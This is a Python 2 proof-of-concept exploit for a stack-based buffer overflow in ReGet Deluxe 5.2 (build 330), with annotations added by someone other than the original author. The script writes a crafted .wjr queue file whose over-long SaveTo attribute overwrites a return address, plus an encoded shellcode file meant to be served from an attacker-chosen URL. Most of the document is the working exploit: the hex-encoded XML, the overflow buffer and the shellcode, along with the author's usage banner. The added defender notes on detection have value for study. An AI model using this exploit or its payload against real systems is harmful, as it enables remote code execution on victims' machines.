import sys
# Proof-of-concept for a stack-based overflow in ReGet Deluxe 5.2 (build 330),
# presumably triggered when the application loads a crafted .wjr download-queue
# file. Python 2 syntax (print statements) -- will not run unmodified on Python 3.
#
# The script only writes two files to the current directory; it contacts nothing:
#   devil.wjr  - an XML queue file (header + buff + foot). The Download element's
#                SaveTo="..." attribute is left open at the end of `header` and is
#                filled with the over-long value built in `buff`; `foot` closes it.
#   shellcode  - the second-stage payload (`evil`). The queue file's Url attribute is
#                "http://" + sys.argv[1], so this file is presumably meant to be served
#                from that location by some other means (not done here).
#
# Defender notes: a legitimate SaveTo value is a Windows path, whereas the one
# written here is ~1.3 KB of filler plus a 4-byte address; .wjr files with attribute
# values of that length are a workable detection signature. The return address is
# hard-coded for one OS build (see the author's comment on `buff`), so this PoC is
# not portable as written. Queue files from untrusted sources should be treated as
# untrusted input by the parser.
print ""
print " ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit"
print " By: Encrypt3d.M!nd "
print " http://m1nd3d.wordpress.com/ "
print " For Details visit my blog "
print ""
try:
    # XML prologue and the <ReGetJr ...><Queue><Download ...> element, as raw bytes.
    # Decoded, it begins '<?xml version="1.0" encoding="UTF-8" ?>' followed by
    # '<!-- Generated by ReGet Deluxe 5.2 (build 330) -->'. It ends with the bytes for
    # 'SaveTo="' so that the overflow value in `buff` lands inside that attribute.
    # The only variable part is the Url attribute: 'Url="http://' + sys.argv[1] + '"'.
    header = (
        "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F"
        "\x64\x69\x6E\x67\x3D\x22\x55\x54\x46\x2D\x38\x22\x20\x3F\x3E\x0D\x0A\x3C\x21\x2D\x2D\x20\x47\x65"
        "\x6E\x65\x72\x61\x74\x65\x64\x20\x62\x79\x20\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x20"
        "\x35\x2E\x32\x20\x28\x62\x75\x69\x6C\x64\x20\x33\x33\x30\x29\x20\x2D\x2D\x3E\x0D\x0A\x3C\x52\x65"
        "\x47\x65\x74\x4A\x72\x0D\x0A\x09\x4C\x61\x73\x74\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09\x50\x72\x65"
        "\x64\x65\x66\x69\x6E\x65\x64\x43\x61\x74\x65\x67\x6F\x72\x69\x65\x73\x3D\x22\x31\x22\x0D\x0A\x09"
        "\x54\x72\x61\x66\x66\x69\x63\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x54"
        "\x72\x61\x66\x66\x69\x63\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x32\x22\x0D\x0A\x09"
        "\x4D\x61\x78\x53\x65\x63\x74\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x4D"
        "\x61\x78\x53\x65\x63\x74\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x31\x22\x0D\x0A\x09"
        "\x4D\x61\x78\x53\x65\x63\x74\x55\x6E\x6C\x69\x6D\x69\x74\x65\x64\x3D\x22\x33\x22\x0D\x0A\x09\x53"
        "\x61\x76\x65\x54\x6F\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x20\x61\x6E\x64\x20"
        "\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79\x20\x44\x6F\x63\x75"
        "\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x22\x0D\x0A\x09\x4D\x61"
        "\x78\x45\x72\x72\x6F\x72\x43\x6F\x75\x6E\x74\x3D\x22\x31\x30\x30\x22\x0D\x0A\x09\x54\x72\x79\x50"
        "\x61\x75\x73\x65\x3D\x22\x35\x22\x0D\x0A\x09\x54\x69\x6D\x65\x4F\x75\x74\x3D\x22\x39\x30\x22\x0D"
        "\x0A\x09\x4D\x69\x6E\x53\x65\x63\x74\x69\x6F\x6E\x53\x69\x7A\x65\x3D\x22\x31\x30\x30\x30\x30\x22"
        "\x0D\x0A\x09\x41\x75\x74\x6F\x53\x61\x76\x65\x52\x65\x73\x75\x6C\x74\x46\x69\x6C\x65\x3D\x22\x43"
        "\x3A\x5C\x50\x72\x6F\x67\x72\x61\x6D\x20\x46\x69\x6C\x65\x73\x5C\x52\x65\x47\x65\x74\x20\x53\x6F"
        "\x66\x74\x77\x61\x72\x65\x5C\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x5C\x73\x65\x61\x72"
        "\x63\x68\x2E\x78\x6D\x6C\x22\x0D\x0A\x09\x3E\x0D\x0A\x09\x3C\x51\x75\x65\x75\x65\x3E\x0D\x0A\x09"
        "\x09\x3C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x0D\x0A\x09\x09\x09\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09"
        "\x09\x09\x46\x69\x6C\x65\x4E\x61\x6D\x65\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73"
        "\x20\x61\x6E\x64\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79"
        "\x20\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x5C"
        "\x61\x2E\x65\x78\x65\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x74\x65\x3D\x22\x33\x22\x0D\x0A\x09\x09"
        "\x09\x44\x6F\x6E\x74\x55\x73\x65\x43\x61\x74\x65\x67\x6F\x72\x79\x53\x6F\x72\x74\x69\x6E\x67\x3D"
        "\x22\x30\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x72\x74\x44\x6C\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D"
        "\x0A\x09\x09\x09\x43\x72\x65\x61\x74\x69\x6F\x6E\x54\x69\x6D\x65\x3D\x22\x32\x35\x2E\x31\x32\x2E"
        "\x32\x30\x30\x39\x20\x31\x34\x3A\x35\x38\x3A\x30\x32\x22\x0D\x0A\x09\x09\x09\x4C\x61\x73\x74\x53"
        "\x74\x61\x72\x74\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D\x0A\x09\x09\x09\x55\x72\x6C\x3D\x22\x68\x74"
        "\x74\x70\x3A\x2F\x2F"+sys.argv[1]+"\x22\x0D\x0A\x09"
        "\x09\x09\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x43\x61\x74\x65\x67\x6F\x72\x79\x3D\x22\x2D\x31\x22\x0D"
        "\x0A\x09\x09\x09\x53\x61\x76\x65\x54\x6F\x3D\x22")
    # Overflow value for the SaveTo attribute: 268 filler bytes up to the saved
    # return address, the 4-byte address itself (little-endian; per the author's
    # comment a `call edi` on Windows XP SP3 -- OS/build specific, not verified
    # here), then 1000 more filler bytes. The 268-byte distance is the one
    # parameter tied to the vulnerable buffer's size.
    buff = "\x41" * 268
    buff+= "\x5F\x4D\x48\x7E" # call edi - winxp sp3 (friendly chars)
    buff+= "\x41" * 1000
    # Closes the SaveTo attribute ('"'), adds AutoStartCreate="1", and closes the
    # Download, Queue and ReGetJr elements so the file is still well-formed XML.
    foot = (
        "\x22\x0D\x0A\x09\x09\x09\x41\x75\x74\x6F\x53\x74\x61\x72\x74\x43\x72\x65\x61\x74\x65\x3D\x22\x31"
        "\x22\x0D\x0A\x09\x09\x20\x2F\x3E\x0D\x0A\x09\x3C\x2F\x51\x75\x65\x75\x65\x3E\x0D\x0A\x3C\x2F\x52"
        "\x65\x47\x65\x74\x4A\x72\x3E\x0D\x0A")
    # Second-stage payload written to the 'shellcode' file: a 100-byte NOP sled
    # (0x90), a machine-code blob whose bulk lies in the printable-ASCII range
    # (consistent with an alphanumeric encoder -- the decoded behaviour cannot be
    # determined from this listing), and 70000 bytes of filler.
    evil = "\x90" * 100
    evil+= (
        "\x89\xe6\xd9\xc7\xd9\x76\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
        "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
        "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
        "\x4c\x4a\x48\x4c\x49\x43\x30\x43\x30\x45\x50\x45\x30\x4b\x39"
        "\x4a\x45\x46\x51\x4e\x32\x51\x74\x4c\x4b\x46\x32\x44\x70\x4c"
        "\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4e\x6b\x51\x62"
        "\x47\x58\x44\x4f\x48\x37\x51\x5a\x45\x76\x46\x51\x49\x6f\x45"
        "\x61\x4f\x30\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x45\x52\x46\x4c"
        "\x47\x50\x4f\x31\x4a\x6f\x44\x4d\x45\x51\x4f\x37\x4d\x32\x48"
        "\x70\x42\x72\x46\x37\x4c\x4b\x46\x32\x42\x30\x4e\x6b\x50\x42"
        "\x45\x6c\x47\x71\x4e\x30\x4e\x6b\x51\x50\x51\x68\x4c\x45\x4f"
        "\x30\x44\x34\x51\x5a\x46\x61\x48\x50\x42\x70\x4c\x4b\x50\x48"
        "\x42\x38\x4c\x4b\x50\x58\x51\x30\x46\x61\x4e\x33\x4d\x33\x47"
        "\x4c\x43\x79\x4c\x4b\x50\x34\x4c\x4b\x46\x61\x4a\x76\x46\x51"
        "\x49\x6f\x44\x71\x49\x50\x4c\x6c\x4b\x71\x4a\x6f\x46\x6d\x47"
        "\x71\x4f\x37\x46\x58\x4b\x50\x43\x45\x4a\x54\x43\x33\x43\x4d"
        "\x4b\x48\x47\x4b\x43\x4d\x51\x34\x43\x45\x4b\x52\x42\x78\x4c"
        "\x4b\x46\x38\x45\x74\x46\x61\x4a\x73\x45\x36\x4c\x4b\x46\x6c"
        "\x50\x4b\x4e\x6b\x43\x68\x45\x4c\x46\x61\x4e\x33\x4c\x4b\x46"
        "\x64\x4e\x6b\x43\x31\x4e\x30\x4e\x69\x51\x54\x46\x44\x51\x34"
        "\x51\x4b\x51\x4b\x43\x51\x51\x49\x51\x4a\x50\x51\x49\x6f\x49"
        "\x70\x51\x48\x51\x4f\x43\x6a\x4c\x4b\x42\x32\x4a\x4b\x4f\x76"
        "\x43\x6d\x50\x6a\x47\x71\x4e\x6d\x4d\x55\x4e\x59\x47\x70\x43"
        "\x30\x45\x50\x46\x30\x42\x48\x44\x71\x4e\x6b\x42\x4f\x4f\x77"
        "\x4b\x4f\x4a\x75\x4d\x6b\x4d\x30\x45\x4d\x46\x4a\x44\x4a\x42"
        "\x48\x49\x36\x4c\x55\x4d\x6d\x4d\x4d\x49\x6f\x4e\x35\x45\x6c"
        "\x45\x56\x51\x6c\x44\x4a\x4b\x30\x4b\x4b\x4b\x50\x51\x65\x44"
        "\x45\x4d\x6b\x50\x47\x44\x53\x42\x52\x50\x6f\x42\x4a\x43\x30"
        "\x46\x33\x4b\x4f\x4a\x75\x42\x43\x50\x61\x50\x6c\x42\x43\x43"
        "\x30\x41\x41")
    evil+="\x41" * 70000
    # Both files are opened in text mode ('w'); on Windows that translates
    # "\n" to "\r\n", which would alter the byte layout written to disk.
    # Neither handle is protected by try/finally or `with`.
    wjr_file=open('devil.wjr','w')
    wjr_file.write(header+buff+foot)
    wjr_file.close()
    print "[+] 'devil.wjr' Created Successfully"
    devil_file=open('shellcode','w')
    devil_file.write(evil)
    devil_file.close()
    print "[+] 'shellcode' Created Successfully"
# Bare except: every failure (a missing sys.argv[1], but also permission or disk
# errors while writing) is swallowed and reported as a usage mistake, so the real
# cause is never shown.
except:
    print "###################################################"
    print " Usage: exploit.py [payload] "
    print " [payload] = url to shellcode without(http://) "
    print " Example: "
    print " exploit.py www.site.com/shellcode "
|